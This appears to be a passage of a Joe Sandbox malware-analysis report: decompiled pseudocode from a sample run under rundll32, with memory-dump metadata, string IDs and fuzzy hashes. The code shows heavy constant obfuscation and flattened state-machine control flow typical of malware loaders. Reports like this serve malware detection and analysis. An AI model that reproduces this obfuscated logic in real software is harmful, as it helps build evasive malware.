                                                                                                                      				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) + 0x3665;
                                                                                                                      				_t472 = 0x78;
                                                                                                                      				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) / _t472;
                                                                                                                      				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) ^ 0x00011e0c;
                                                                                                                      				 *(_t489 + 0x20) = 0x383fb4;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0xbc1f7ed2;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x73642c82;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) >> 0xa;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x003dbfb6;
                                                                                                                      				 *(_t489 + 0x5c) = 0xbb8564;
                                                                                                                      				_t473 = 0x44;
                                                                                                                      				 *(_t489 + 0x5c) =  *(_t489 + 0x5c) / _t473;
                                                                                                                      				_t474 = 0x6f;
                                                                                                                      				 *(_t489 + 0x58) =  *(_t489 + 0x5c) * 0x17;
                                                                                                                      				 *(_t489 + 0x58) =  *(_t489 + 0x58) ^ 0x00393d4f;
                                                                                                                      				 *(_t489 + 0x14) = 0x7f7e5e;
                                                                                                                      				 *(_t489 + 0x14) =  *(_t489 + 0x14) + 0xaaec;
                                                                                                                      				 *(_t489 + 0x14) =  *(_t489 + 0x14) + 0x89a4;
                                                                                                                      				 *(_t489 + 0x14) =  *(_t489 + 0x14) >> 0xe;
                                                                                                                      				 *(_t489 + 0x14) =  *(_t489 + 0x14) ^ 0x000cd586;
                                                                                                                      				 *(_t489 + 0x98) = 0xf466ca;
                                                                                                                      				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0x21e472eb;
                                                                                                                      				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0x21177926;
                                                                                                                      				 *(_t489 + 0x8c) = 0xf41dfa;
                                                                                                                      				 *(_t489 + 0x8c) =  *(_t489 + 0x8c) << 7;
                                                                                                                      				 *(_t489 + 0x8c) =  *(_t489 + 0x8c) ^ 0x7a009fd6;
                                                                                                                      				 *(_t489 + 0x70) = 0x5bd344;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffffa539;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0xd954c9cc;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0xd906e478;
                                                                                                                      				 *(_t489 + 0x20) = 0x13a841;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) * 0x2b;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x070f8edd;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) / _t474;
                                                                                                                      				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x0006f8e9;
                                                                                                                      				 *(_t489 + 0x38) = 0xfa8d3a;
                                                                                                                      				 *(_t489 + 0x38) =  *(_t489 + 0x38) + 0xb40d;
                                                                                                                      				 *(_t489 + 0x38) =  *(_t489 + 0x38) >> 0xd;
                                                                                                                      				 *(_t489 + 0x38) =  *(_t489 + 0x38) + 0xfffffdcd;
                                                                                                                      				 *(_t489 + 0x38) =  *(_t489 + 0x38) ^ 0x0000539f;
                                                                                                                      				 *(_t489 + 0x48) = 0x9c2d9c;
                                                                                                                      				 *(_t489 + 0x48) =  *(_t489 + 0x48) + 0xffff4328;
                                                                                                                      				 *(_t489 + 0x48) =  *(_t489 + 0x48) | 0x335ced82;
                                                                                                                      				 *(_t489 + 0x48) =  *(_t489 + 0x48) ^ 0x33dc9cbe;
                                                                                                                      				 *(_t489 + 0x80) = 0x96612e;
                                                                                                                      				_t475 = 0x1b;
                                                                                                                      				 *(_t489 + 0x84) =  *(_t489 + 0x80) * 6;
                                                                                                                      				 *(_t489 + 0x84) =  *(_t489 + 0x84) ^ 0x0382c053;
                                                                                                                      				 *(_t489 + 0x1c) = 0xc28e37;
                                                                                                                      				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xffffbfaa;
                                                                                                                      				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xcb4;
                                                                                                                      				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xffffb9e8;
                                                                                                                      				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) ^ 0x00c80396;
                                                                                                                      				 *(_t489 + 0x34) = 0xb1f5e0;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) / _t475;
                                                                                                                      				_t476 = 0x71;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) / _t476;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) | 0xfe0fc038;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xfe0a805e;
                                                                                                                      				 *(_t489 + 0x78) = 0xafc36d;
                                                                                                                      				 *(_t489 + 0x78) =  *(_t489 + 0x78) >> 0xc;
                                                                                                                      				_t477 = 0x76;
                                                                                                                      				 *(_t489 + 0x78) =  *(_t489 + 0x78) / _t477;
                                                                                                                      				 *(_t489 + 0x78) =  *(_t489 + 0x78) ^ 0x000041ea;
                                                                                                                      				 *(_t489 + 0x98) = 0x19521f;
                                                                                                                      				 *(_t489 + 0x98) =  *(_t489 + 0x98) | 0xd8938a8f;
                                                                                                                      				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0xd896baad;
                                                                                                                      				 *(_t489 + 0xa0) = 0x8c17;
                                                                                                                      				 *(_t489 + 0xa0) =  *(_t489 + 0xa0) | 0xdec19f4d;
                                                                                                                      				 *(_t489 + 0xa0) =  *(_t489 + 0xa0) ^ 0xdec779d8;
                                                                                                                      				 *(_t489 + 0xa4) = 0xd8bcc0;
                                                                                                                      				 *(_t489 + 0xa4) =  *(_t489 + 0xa4) | 0xa8247ef5;
                                                                                                                      				 *(_t489 + 0xa4) =  *(_t489 + 0xa4) ^ 0xa8ff4c77;
                                                                                                                      				 *(_t489 + 0x28) = 0x29b40a;
                                                                                                                      				 *(_t489 + 0x28) =  *(_t489 + 0x28) + 0xffff8872;
                                                                                                                      				 *(_t489 + 0x28) =  *(_t489 + 0x28) ^ 0xb7a5f24a;
                                                                                                                      				_t478 = 0x4b;
                                                                                                                      				 *(_t489 + 0x28) =  *(_t489 + 0x28) * 0x6c;
                                                                                                                      				 *(_t489 + 0x28) =  *(_t489 + 0x28) ^ 0x6f6c7a54;
                                                                                                                      				 *(_t489 + 0x58) = 0x4b8f45;
                                                                                                                      				 *(_t489 + 0x58) =  *(_t489 + 0x58) / _t478;
                                                                                                                      				_t479 = 0x65;
                                                                                                                      				 *(_t489 + 0x58) =  *(_t489 + 0x58) * 0x3a;
                                                                                                                      				 *(_t489 + 0x58) =  *(_t489 + 0x58) ^ 0x003d129f;
                                                                                                                      				 *(_t489 + 0x50) = 0xbe9ee7;
                                                                                                                      				 *(_t489 + 0x50) =  *(_t489 + 0x50) / _t479;
                                                                                                                      				_t480 = 0x21;
                                                                                                                      				 *(_t489 + 0x4c) =  *(_t489 + 0x50) / _t480;
                                                                                                                      				 *(_t489 + 0x4c) =  *(_t489 + 0x4c) ^ 0x0002cf44;
                                                                                                                      				 *(_t489 + 0x60) = 0x65600b;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) | 0xec945ebd;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) >> 3;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) ^ 0x1d945acd;
                                                                                                                      				 *(_t489 + 0x2c) = 0xa0640b;
                                                                                                                      				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) >> 0xc;
                                                                                                                      				_t487 =  *(_t489 + 0x80);
                                                                                                                      				_t481 = 0x18;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x2c) / _t481;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x30) + 0xffff1131;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x30) ^ 0xfffa9798;
                                                                                                                      				 *(_t489 + 0x88) = 0xf27f7;
                                                                                                                      				 *(_t489 + 0x88) =  *(_t489 + 0x88) | 0x77366d7c;
                                                                                                                      				 *(_t489 + 0x88) =  *(_t489 + 0x88) ^ 0x7735274d;
                                                                                                                      				 *(_t489 + 0x60) = 0x482c82;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) << 3;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) << 6;
                                                                                                                      				 *(_t489 + 0x60) =  *(_t489 + 0x60) ^ 0x9054890c;
                                                                                                                      				 *(_t489 + 0x70) = 0x370d16;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffff6d24;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffff76cf;
                                                                                                                      				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0x00352e72;
                                                                                                                      				 *(_t489 + 0x68) = 0x1def33;
                                                                                                                      				 *(_t489 + 0x68) =  *(_t489 + 0x68) << 6;
                                                                                                                      				 *(_t489 + 0x68) =  *(_t489 + 0x68) | 0x037a4cde;
                                                                                                                      				 *(_t489 + 0x68) =  *(_t489 + 0x68) ^ 0x077b4a65;
                                                                                                                      				 *(_t489 + 0x6c) = 0xb09c0e;
                                                                                                                      				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) | 0xdb8bd061;
                                                                                                                      				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) << 0xb;
                                                                                                                      				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) ^ 0xdee5f4d6;
                                                                                                                      				 *(_t489 + 0x54) = 0x47a16a;
                                                                                                                      				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0x8e9bba09;
                                                                                                                      				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0x2cf08045;
                                                                                                                      				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0xa22d7119;
                                                                                                                      				 *(_t489 + 0x94) = 0xf12a19;
                                                                                                                      				 *(_t489 + 0x94) =  *(_t489 + 0x94) >> 0xe;
                                                                                                                      				 *(_t489 + 0x94) =  *(_t489 + 0x94) ^ 0x000f202b;
                                                                                                                      				 *(_t489 + 0x14) = 0xa6bc3b;
                                                                                                                      				 *(_t489 + 0x14) =  *(_t489 + 0x14) ^ 0xdd735814;
                                                                                                                      				_t482 = 0x17;
                                                                                                                      				_t468 =  *(_t489 + 0x7c);
                                                                                                                      				 *(_t489 + 0x10) =  *(_t489 + 0x14) / _t482;
                                                                                                                      				 *(_t489 + 0x10) =  *(_t489 + 0x10) ^ 0xd88d4109;
                                                                                                                      				 *(_t489 + 0x10) =  *(_t489 + 0x10) ^ 0xd12bee16;
                                                                                                                      				 *(_t489 + 0x3c) = 0xc5a0fe;
                                                                                                                      				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) ^ 0x68fedc8a;
                                                                                                                      				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) + 0xffff2d8b;
                                                                                                                      				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) << 2;
                                                                                                                      				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) ^ 0xa0e5a913;
                                                                                                                      				_t418 =  *(_t489 + 0x7c);
                                                                                                                      				_t483 =  *(_t489 + 0x7c);
                                                                                                                      				 *(_t489 + 0x88) = 0x6bfd68;
                                                                                                                      				 *(_t489 + 0x88) =  *(_t489 + 0x88) + 0xb2a;
                                                                                                                      				 *(_t489 + 0x88) =  *(_t489 + 0x88) ^ 0x0062c11e;
                                                                                                                      				 *(_t489 + 0x44) = 0xc29f93;
                                                                                                                      				 *(_t489 + 0x44) =  *(_t489 + 0x44) >> 3;
                                                                                                                      				 *(_t489 + 0x44) =  *(_t489 + 0x44) << 1;
                                                                                                                      				 *(_t489 + 0x44) =  *(_t489 + 0x44) ^ 0x0034c9e7;
                                                                                                                      				 *(_t489 + 0x34) = 0x1f0cbd;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) + 0x9a3;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0x409d3612;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xb603e22c;
                                                                                                                      				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xf682cf9d;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t393 = 0x26766da;
                                                                                                                      					L2:
                                                                                                                      					while(_t420 != 0x1be807e) {
                                                                                                                      						if(_t420 == _t393) {
                                                                                                                      							_t395 = E003457CE( *((intOrPtr*)(_t489 + 0xcc)),  *((intOrPtr*)(_t489 + 0xd0)),  *(_t489 + 0x50), _t418, _t483, _t468, _t420,  *(_t489 + 0x6c),  *(_t489 + 0x60), _t420,  *(_t489 + 0x4c), _t489 + 0xb8, _t420,  *(_t489 + 0x60));
                                                                                                                      							_t489 = _t489 + 0x30;
                                                                                                                      							__eflags = _t395;
                                                                                                                      							if(_t395 == 0) {
                                                                                                                      								_t396 =  *(_t489 + 0xa4);
                                                                                                                      							} else {
                                                                                                                      								_t485 = _t468;
                                                                                                                      								while(1) {
                                                                                                                      									__eflags =  *((intOrPtr*)(_t485 + 4)) - 4;
                                                                                                                      									if( *((intOrPtr*)(_t485 + 4)) != 4) {
                                                                                                                      										goto L18;
                                                                                                                      									}
                                                                                                                      									L17:
                                                                                                                      									_t349 = _t485 + 0xc; // 0x11e18
                                                                                                                      									_t401 = E0035FC96( *(_t489 + 0x34),  *(_t489 + 0x8c), _t487,  *(_t489 + 0x60), _t349);
                                                                                                                      									_t489 = _t489 + 0xc;
                                                                                                                      									__eflags = _t401;
                                                                                                                      									if(_t401 == 0) {
                                                                                                                      										_t396 = 1;
                                                                                                                      										 *(_t489 + 0xa4) = 1;
                                                                                                                      									} else {
                                                                                                                      										goto L18;
                                                                                                                      									}
                                                                                                                      									L23:
                                                                                                                      									_t483 =  *(_t489 + 0x7c);
                                                                                                                      									goto L24;
                                                                                                                      									L18:
                                                                                                                      									_t399 =  *_t485;
                                                                                                                      									__eflags = _t399;
                                                                                                                      									if(_t399 == 0) {
                                                                                                                      										_t396 =  *(_t489 + 0xa4);
                                                                                                                      									} else {
                                                                                                                      										_t485 = _t485 + _t399;
                                                                                                                      										__eflags =  *((intOrPtr*)(_t485 + 4)) - 4;
                                                                                                                      										if( *((intOrPtr*)(_t485 + 4)) != 4) {
                                                                                                                      											goto L18;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      									goto L23;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L24:
                                                                                                                      							__eflags = _t396;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								_t393 = 0x26766da;
                                                                                                                      								_t420 = 0x26766da;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								_t464 =  *0x365208; // 0x0
                                                                                                                      								E00347519( *(_t489 + 0x70),  *_t464,  *((intOrPtr*)(_t489 + 0x64)));
                                                                                                                      								_t420 = 0xa9f14cf;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      							L32:
                                                                                                                      						} else {
                                                                                                                      							if(_t420 == 0x7d55797) {
                                                                                                                      								_t334 = _t489 + 0x28; // 0x6f6c7a54
                                                                                                                      								E003612A8(_t420,  *_t334, __eflags,  *(_t489 + 0x60),  *((intOrPtr*)(_t489 + 0x18)), _t489 + 0xb8);
                                                                                                                      								_t405 = E00354FA8( *((intOrPtr*)(_t489 + 0xac)), _t489 + 0xc8,  *((intOrPtr*)(_t489 + 0x9c)),  *(_t489 + 0x7c));
                                                                                                                      								_t487 = _t405;
                                                                                                                      								_t489 = _t489 + 0x14;
                                                                                                                      								_t420 = 0xe18b597;
                                                                                                                      								 *((short*)(_t405 - 2)) = 0;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t393 = 0x26766da;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t420 == 0x9eda0b2) {
                                                                                                                      									E00354DAD( *(_t489 + 0x44),  *((intOrPtr*)(_t489 + 0x90)), _t418,  *(_t489 + 0x48),  *(_t489 + 0x34));
                                                                                                                      								} else {
                                                                                                                      									if(_t420 == 0xa9f14cf) {
                                                                                                                      										E003468DE( *((intOrPtr*)(_t489 + 0x74)),  *(_t489 + 0x5c),  *(_t489 + 0x98),  *(_t489 + 0x14), _t468);
                                                                                                                      										_t489 = _t489 + 0xc;
                                                                                                                      										_t420 = 0x9eda0b2;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t393 = 0x26766da;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t420 == 0xacf19b8) {
                                                                                                                      											_t483 = 0x1000;
                                                                                                                      											_push(_t420);
                                                                                                                      											_push(_t420);
                                                                                                                      											 *(_t489 + 0x84) = 0x1000;
                                                                                                                      											_t468 = E00353512(0x1000);
                                                                                                                      											_t393 = 0x26766da;
                                                                                                                      											__eflags = _t468;
                                                                                                                      											_t420 =  !=  ? 0x26766da : 0x9eda0b2;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t420 != 0xe18b597) {
                                                                                                                      												L28:
                                                                                                                      												__eflags = _t420 - 0x5473740;
                                                                                                                      												if(__eflags != 0) {
                                                                                                                      													continue;
                                                                                                                      												} else {
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												_t416 = E0035E938(0x2000000, 1,  *(_t489 + 0x44),  *(_t489 + 0x58),  *(_t489 + 0x94), _t420,  *(_t489 + 0x5c),  *((intOrPtr*)(_t489 + 0x90)), _t420,  *(_t489 + 0x20),  *(_t489 + 0x2c) | 0x00000006, _t489 + 0xb8);
                                                                                                                      												_t418 = _t416;
                                                                                                                      												_t489 = _t489 + 0x28;
                                                                                                                      												if(_t416 != 0xffffffff) {
                                                                                                                      													_t420 = 0xacf19b8;
                                                                                                                      													while(1) {
                                                                                                                      														L1:
                                                                                                                      														_t393 = 0x26766da;
                                                                                                                      														goto L2;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						__eflags = 0;
                                                                                                                      						return 0;
                                                                                                                      						goto L32;
                                                                                                                      					}
                                                                                                                      					_t420 = 0x7d55797;
                                                                                                                      					goto L28;
                                                                                                                      				}
                                                                                                                      			}




























                                                                                                                      0x00359f06
                                                                                                                      0x00000000
                                                                                                                      0x00359f06
                                                                                                                      0x00359f2b
                                                                                                                      0x00359f31
                                                                                                                      0x0035a13f
                                                                                                                      0x00359f37
                                                                                                                      0x00359f3d
                                                                                                                      0x00359ffc
                                                                                                                      0x0035a001
                                                                                                                      0x0035a004
                                                                                                                      0x00359f06
                                                                                                                      0x00359f06
                                                                                                                      0x00359f06
                                                                                                                      0x00000000
                                                                                                                      0x00359f06
                                                                                                                      0x00359f43
                                                                                                                      0x00359f49
                                                                                                                      0x00359fb3
                                                                                                                      0x00359fc0
                                                                                                                      0x00359fc1
                                                                                                                      0x00359fc4
                                                                                                                      0x00359fd1
                                                                                                                      0x00359fd3
                                                                                                                      0x00359fd9
                                                                                                                      0x00359fe0
                                                                                                                      0x00000000
                                                                                                                      0x00359f4b
                                                                                                                      0x00359f51
                                                                                                                      0x0035a11d
                                                                                                                      0x0035a11d
                                                                                                                      0x0035a123
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035a129
                                                                                                                      0x00359f57
                                                                                                                      0x00359f8f
                                                                                                                      0x00359f94
                                                                                                                      0x00359f96
                                                                                                                      0x00359f9c
                                                                                                                      0x00359fa2
                                                                                                                      0x00359f06
                                                                                                                      0x00359f06
                                                                                                                      0x00359f06
                                                                                                                      0x00000000
                                                                                                                      0x00359f06
                                                                                                                      0x00359f06
                                                                                                                      0x00359f9c
                                                                                                                      0x00359f51
                                                                                                                      0x00359f49
                                                                                                                      0x00359f3d
                                                                                                                      0x00359f31
                                                                                                                      0x00359f25
                                                                                                                      0x0035a14a
                                                                                                                      0x0035a153
                                                                                                                      0x00000000
                                                                                                                      0x0035a153
                                                                                                                      0x0035a118
                                                                                                                      0x00000000
                                                                                                                      0x0035a118

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: M'5w$O=9$Oi$Tzlo$Tzlo$e6$pv$A$r!
                                                                                                                      • API String ID: 0-534902951
                                                                                                                      • Opcode ID: 16057298455d2b9f084242d76ea323dff45dd54a238cc26da077c3749b71e8e3
                                                                                                                      • Instruction ID: a58343939b0e200bc718691faafb6ffccaac60b011a090e61e9199a4835bfdcb
                                                                                                                      • Opcode Fuzzy Hash: 16057298455d2b9f084242d76ea323dff45dd54a238cc26da077c3749b71e8e3
                                                                                                                      • Instruction Fuzzy Hash: 471230715087809FD3A9CF25C58AA5BBBE1FBC4358F108A1DF6DA86260D7B48949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E003574DD() {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				char _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				unsigned int _v128;
                                                                                                                      				unsigned int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				void* _t373;
                                                                                                                      				signed int* _t377;
                                                                                                                      				signed int _t381;
                                                                                                                      				signed int _t383;
                                                                                                                      				signed int* _t384;
                                                                                                                      				void* _t385;
                                                                                                                      				intOrPtr _t396;
                                                                                                                      				signed int _t398;
                                                                                                                      				signed int _t399;
                                                                                                                      				signed int _t400;
                                                                                                                      				signed int _t401;
                                                                                                                      				signed int _t402;
                                                                                                                      				signed int _t403;
                                                                                                                      				signed int _t404;
                                                                                                                      				signed int _t405;
                                                                                                                      				signed int _t406;
                                                                                                                      				signed int _t407;
                                                                                                                      				signed int _t408;
                                                                                                                      				void* _t409;
                                                                                                                      				signed int* _t410;
                                                                                                                      				signed int* _t444;
                                                                                                                      				void* _t452;
                                                                                                                      				signed int* _t456;
                                                                                                                      
                                                                                                                      				_t456 =  &_v152;
                                                                                                                      				_v8 = 0x511491;
                                                                                                                      				_t396 = 0;
                                                                                                                      				_t452 = 0x68b0bf3;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v108 = 0xf5425d;
                                                                                                                      				_t398 = 0x24;
                                                                                                                      				_v108 = _v108 / _t398;
                                                                                                                      				_v108 = _v108 | 0xbb3a7fab;
                                                                                                                      				_v108 = _v108 ^ 0xbb3effbb;
                                                                                                                      				_v132 = 0xf54152;
                                                                                                                      				_v132 = _v132 + 0x73b9;
                                                                                                                      				_v132 = _v132 | 0x673a86bd;
                                                                                                                      				_v132 = _v132 >> 4;
                                                                                                                      				_v132 = _v132 ^ 0x067ffb7b;
                                                                                                                      				_v36 = 0x17d741;
                                                                                                                      				_v36 = _v36 << 0xe;
                                                                                                                      				_v36 = _v36 ^ 0xf5d04000;
                                                                                                                      				_v72 = 0xb99ed8;
                                                                                                                      				_t399 = 0x74;
                                                                                                                      				_v72 = _v72 * 0x57;
                                                                                                                      				_v72 = _v72 ^ 0x28cb8c28;
                                                                                                                      				_v72 = _v72 ^ 0x17df7740;
                                                                                                                      				_v100 = 0xb82182;
                                                                                                                      				_v100 = _v100 >> 2;
                                                                                                                      				_v100 = _v100 | 0xc07135d2;
                                                                                                                      				_v100 = _v100 ^ 0xc07f3df2;
                                                                                                                      				_v120 = 0x71fefc;
                                                                                                                      				_v120 = _v120 ^ 0x3c3b57cf;
                                                                                                                      				_v120 = _v120 ^ 0xde073c70;
                                                                                                                      				_v120 = _v120 + 0xffffefcb;
                                                                                                                      				_v120 = _v120 ^ 0xe24618f4;
                                                                                                                      				_v128 = 0x9b3c32;
                                                                                                                      				_v128 = _v128 >> 0xb;
                                                                                                                      				_v128 = _v128 ^ 0x48395a77;
                                                                                                                      				_v128 = _v128 >> 0xf;
                                                                                                                      				_v128 = _v128 ^ 0x000e9da5;
                                                                                                                      				_v136 = 0x52cc3f;
                                                                                                                      				_v136 = _v136 * 0x6b;
                                                                                                                      				_v136 = _v136 ^ 0x9c4f2321;
                                                                                                                      				_v136 = _v136 | 0xfd912896;
                                                                                                                      				_v136 = _v136 ^ 0xffd2684a;
                                                                                                                      				_v48 = 0x5298d7;
                                                                                                                      				_v48 = _v48 ^ 0x46ea6646;
                                                                                                                      				_v48 = _v48 ^ 0x46b0922b;
                                                                                                                      				_v112 = 0xeb4fde;
                                                                                                                      				_v112 = _v112 / _t399;
                                                                                                                      				_v112 = _v112 >> 0xc;
                                                                                                                      				_t400 = 0x56;
                                                                                                                      				_v112 = _v112 / _t400;
                                                                                                                      				_v112 = _v112 ^ 0x0003a7ac;
                                                                                                                      				_v52 = 0x2cac0;
                                                                                                                      				_v52 = _v52 + 0x2e2d;
                                                                                                                      				_v52 = _v52 ^ 0x00080243;
                                                                                                                      				_v124 = 0x3dbea4;
                                                                                                                      				_v124 = _v124 + 0x560a;
                                                                                                                      				_v124 = _v124 >> 0x10;
                                                                                                                      				_v124 = _v124 >> 9;
                                                                                                                      				_v124 = _v124 ^ 0x00027af4;
                                                                                                                      				_v56 = 0x4e9164;
                                                                                                                      				_v56 = _v56 >> 0xd;
                                                                                                                      				_v56 = _v56 ^ 0x00077014;
                                                                                                                      				_v28 = 0x1ac9f;
                                                                                                                      				_v28 = _v28 << 7;
                                                                                                                      				_v28 = _v28 ^ 0x00d40977;
                                                                                                                      				_v148 = 0xc87974;
                                                                                                                      				_t401 = 0xf;
                                                                                                                      				_v148 = _v148 / _t401;
                                                                                                                      				_v148 = _v148 + 0x3bc4;
                                                                                                                      				_v148 = _v148 >> 2;
                                                                                                                      				_v148 = _v148 ^ 0x0004ff8e;
                                                                                                                      				_v140 = 0x51bf99;
                                                                                                                      				_v140 = _v140 + 0x1f0d;
                                                                                                                      				_v140 = _v140 | 0x6ce4c515;
                                                                                                                      				_v140 = _v140 << 7;
                                                                                                                      				_v140 = _v140 ^ 0x7aef3c21;
                                                                                                                      				_v64 = 0x9041a6;
                                                                                                                      				_v64 = _v64 | 0xf9fd38a0;
                                                                                                                      				_v64 = _v64 + 0x56fc;
                                                                                                                      				_v64 = _v64 ^ 0xf9f31663;
                                                                                                                      				_v96 = 0xb1a19;
                                                                                                                      				_v96 = _v96 + 0x5234;
                                                                                                                      				_t402 = 0x68;
                                                                                                                      				_v96 = _v96 * 0x32;
                                                                                                                      				_v96 = _v96 ^ 0x0237c494;
                                                                                                                      				_v152 = 0x354a37;
                                                                                                                      				_v152 = _v152 | 0x37184972;
                                                                                                                      				_v152 = _v152 ^ 0x144b30cb;
                                                                                                                      				_v152 = _v152 * 0x1f;
                                                                                                                      				_v152 = _v152 ^ 0x4b54d1c6;
                                                                                                                      				_v116 = 0xf3726e;
                                                                                                                      				_v116 = _v116 + 0xcc69;
                                                                                                                      				_v116 = _v116 >> 3;
                                                                                                                      				_v116 = _v116 + 0x674b;
                                                                                                                      				_v116 = _v116 ^ 0x001624aa;
                                                                                                                      				_v44 = 0x3b88ac;
                                                                                                                      				_v44 = _v44 / _t402;
                                                                                                                      				_v44 = _v44 ^ 0x00096110;
                                                                                                                      				_v20 = 0x83fd7f;
                                                                                                                      				_v20 = _v20 ^ 0x5c57be60;
                                                                                                                      				_v20 = _v20 ^ 0x5cd84720;
                                                                                                                      				_v144 = 0x80ab55;
                                                                                                                      				_t403 = 0x46;
                                                                                                                      				_v144 = _v144 / _t403;
                                                                                                                      				_v144 = _v144 + 0xffffcaef;
                                                                                                                      				_v144 = _v144 + 0xffff67c3;
                                                                                                                      				_v144 = _v144 ^ 0x00052ea0;
                                                                                                                      				_v16 = 0xeb356a;
                                                                                                                      				_t199 =  &_v16; // 0xeb356a
                                                                                                                      				_t404 = 0x65;
